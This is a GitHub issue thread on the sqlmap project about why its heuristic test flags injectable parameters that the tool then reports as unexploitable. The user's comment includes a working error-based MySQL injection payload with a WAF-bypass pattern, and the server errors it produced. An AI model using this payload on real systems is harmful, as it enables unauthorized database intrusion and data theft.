search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.98k stars 5.68k forks source link

heuristic (basic) test #807

Closed WilliJoin closed 10 years ago

WilliJoin commented 10 years ago

Why in 90% cases heuristic (basic) test is not wrong but sqlmap cant find sqlinj? Sqlinj exist but sqlmap cant exploit it?

[06:00:45] [INFO] heuristic (basic) test shows that GET parameter 'page' might b e injectable (possible DBMS: 'MySQL') ...... [08:22:04] [WARNING] GET parameter 'page' is not injectable

[10:27:45] [INFO] heuristic (basic) test shows that GET parameter 'id' migh t be injectable (possible DBMS: 'MySQL') [10:27:45] [INFO] testing for SQL injection on GET parameter 'id' [10:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:27:51] [WARNING] reflective value(s) found and filtering out [10:28:02] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable ..... [10:38:38] [WARNING] false positive or unexploitable injection point detected

stamparm commented 10 years ago

read this: A) "heuristic (basic) test shows that GET parameter 'page' might be injectable" B) "unexploitable injection point detected"

in lots of cases there is a WAF that blocks the exploitability. sqlmap can't say that something is vulnerable to SQLI while it's not (at least with used options/switches)

stamparm commented 10 years ago

Also, ...in 90% cases heuristic (basic) test is not wrong.... Whenever you find out by yourself MANUALLY that sqlmap is wrong and you have a working SQLI payload, please free to report. Otherwise, please don't open this kind of issues

WilliJoin commented 10 years ago

Yes i find manually in GET /id=' i get error

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'thumb' AND fi_id IS NOT NULL AND ' at line 5SERVER DATA: in GET /id='and(select%201%20from(select%20count(_)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(51)%2cCHAR(116)%2cCHAR(56)%2cCHAR(103)%2cCHAR(120)%2cCHAR(55)%2cCHAR(97)%2cCHAR(120))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)_2))x%20from%20information_schema.tables%20group%20by%20x)a)and' i get error

SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '4Cu3t8gx7ax1' for key 'group_key'SERVER DATA Sqlmap says [10:27:45] [INFO] heuristic (basic) test shows that GET parameter 'id' migh t be injectable (possible DBMS: 'MySQL') [10:27:45] [INFO] testing for SQL injection on GET parameter 'id' [10:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:27:51] [WARNING] reflective value(s) found and filtering out [10:28:02] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable ..... [10:38:38] [WARNING] false positive or unexploitable injection point detected

stamparm commented 10 years ago

and(select <- this looks like a WAF bypass trick. You've copy/pasted this from somewhere, right?

WilliJoin commented 10 years ago

after unsuccessful exploit wiht sqlmap, i post /id=' this sqlinj in acunetix and it give me 'and(select' this payload

stamparm commented 10 years ago

usage of ( for WAF bypass is hard to implement as it is context sensitive. Acunetix has a predefined set of payloads to check, so it doesn't have to bother with their proper working.